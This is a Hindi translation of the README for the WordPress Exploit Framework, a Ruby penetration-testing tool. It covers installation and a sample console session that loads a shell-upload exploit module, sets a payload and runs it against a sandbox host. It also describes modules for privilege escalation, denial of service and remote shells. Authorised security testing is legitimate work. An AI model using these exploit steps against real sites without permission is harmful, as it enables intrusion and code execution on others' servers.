
वर्डप्रेस सिस्टम की पेनिट्रेशन टेस्टिंग में सहायता के लिए डिज़ाइन किया गया एक रूबी फ्रेमवर्क।

एक Ruby फ्रेमवर्क जो WordPress सिस्टमों की पेनिट्रेशन टेस्टिंग में सहायता के लिए डिज़ाइन किया गया है।
नवीनतम स्थिर बिल्ड स्थापित करने के लिए, gem install wpxf चलाएँ।
स्थापना के बाद, आप wpxf चलाकर WordPress Exploit Framework कंसोल लॉन्च कर सकते हैं।
WordPress Exploit Framework चलाने के लिए Ruby >= 2.4.4 आवश्यक है।
यदि आपको WPXF की निर्भरताओं (विशेष रूप से Nokogiri) को स्थापित करने में समस्या हो रही है, तो पहले सुनिश्चित करें कि आपके पास C एक्सटेंशन संकलित करने के लिए सभी आवश्यक उपकरण हैं:
sudo apt-get install build-essential patch
यह संभव है कि आपके सिस्टम पर महत्वपूर्ण डेवलपमेंट हेडर फ़ाइलें स्थापित न हों। यदि आप इस स्थिति में हैं तो आपको यह करना चाहिए:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libsqlite3-dev
यदि आप libcurl.dll लोड नहीं हो सका जैसी त्रुटियों का अनुभव कर रहे हैं, तो आपको सुनिश्चित करना होगा कि नवीनतम libcurl बाइनरी आपके Ruby bin फ़ोल्डर में, या आपके वातावरण के PATH वेरिएबल में किसी अन्य फ़ोल्डर में शामिल हो।
नवीनतम संस्करण http://curl.haxx.se/download.html से डाउनलोड किया जा सकता है। 16/05/2016 तक, नवीनतम रिलीज़ को Win32 2000/XP zip 7.40.0 libcurl SSL के रूप में चिह्नित किया गया है। आर्काइव डाउनलोड करने के बाद, bin निर्देशिका की सामग्री को अपनी Ruby bin निर्देशिका में निकालें (यदि संकेत दिया जाए, तो मौजूदा DLLs को ओवरराइट न करें)।
wpxf चलाकर WordPress Exploit Framework कंसोल शुरू करें।
लोड होने के बाद, आपको wpxf प्रॉम्प्ट दिखाई देगा, यहां से आप search कमांड का उपयोग करके मॉड्यूल खोज सकते हैं या use कमांड का उपयोग करके मॉड्यूल लोड कर सकते हैं।
अपने वातावरण में एक मॉड्यूल लोड करने से आप set कमांड से विकल्प सेट कर सकेंगे और info का उपयोग करके मॉड्यूल के बारे में जानकारी देख सकेंगे।
नीचे एक उदाहरण है कि कैसे कोई symposium_shell_upload एक्सप्लॉइट मॉड्यूल लोड करेगा, मॉड्यूल और पेलोड विकल्प सेट करेगा और लक्ष्य के विरुद्ध एक्सप्लॉइट चलाएगा।
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
समर्थित कमांड की पूरी सूची के लिए, यह विकी पेज देखें।
सहायक मॉड्यूल आपको लक्ष्य मशीन पर पेलोड चलाने की अनुमति नहीं देते हैं, बल्कि आपको लक्ष्य से जानकारी निकालने, विशेषाधिकार बढ़ाने या सेवा अस्वीकृति कार्यक्षमता प्रदान करने की अनुमति देते हैं।
एक्सप्लॉइट मॉड्यूल के लिए आपको एक पेलोड निर्दिष्ट करना आवश्यक होता है जो बाद में लक्ष्य मशीन पर निष्पादित होता है, जिससे आप मशीन से जानकारी निकालने, एक रिमोट शेल स्थापित करने या वेब सर्वर के संदर्भ में जो कुछ भी करना चाहते हैं, उसे चलाने के लिए मनमाना कोड चला सकते हैं।
ये सभी पेलोड, custom और Meterpreter पेलोड को छोड़कर, निष्पादित होने के बाद स्वयं को हटा देंगे, ताकि उपयोग के बाद लक्ष्य मशीन पर उन्हें छोड़ने से बचा जा सके या यदि उनका उपयोग एक शेल स्थापित करने के लिए किया जा रहा है जो विफल हो जाता है।
मॉड्यूल और पेलोड लिखने के गाइड द विकी पर पाए जा सकते हैं और API का पूर्ण दस्तावेज़ीकरण https://rastating.github.io/wordpress-exploit-framework पर मिल सकता है।
कॉपीराइट (C) 2015-2018 rastating
बिना पूर्व पारस्परिक सहमति के वेबसाइटों के विरुद्ध WordPress Exploit Framework चलाना आपके देश में अवैध हो सकता है। लेखक और इसके विकास में शामिल पक्ष किसी भी दायित्व को स्वीकार नहीं करते हैं और WordPress Exploit Framework द्वारा किए गए किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।
यह प्रोग्राम मुफ्त सॉफ्टवेयर है: आप इसे GNU जनरल पब्लिक लाइसेंस की शर्तों के तहत पुनर्वितरित और/या संशोधित कर सकते हैं जैसा कि फ्री सॉफ्टवेयर फाउंडेशन द्वारा प्रकाशित किया गया है, या तो लाइसेंस का संस्करण 3, या (आपकी पसंद पर) बाद का कोई भी संस्करण।
यह प्रोग्राम इस उम्मीद में वितरित किया जाता है कि यह उपयोगी होगा, लेकिन बिना किसी वारंटी के; व्यापारिकता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटी के बिना भी। अधिक विवरण के लिए GNU जनरल पब्लिक लाइसेंस देखें।
आपको इस प्रोग्राम के साथ GNU जनरल पब्लिक लाइसेंस की एक प्रति प्राप्त होनी चाहिए थी। यदि नहीं, तो http://www.gnu.org/licenses/ देखें।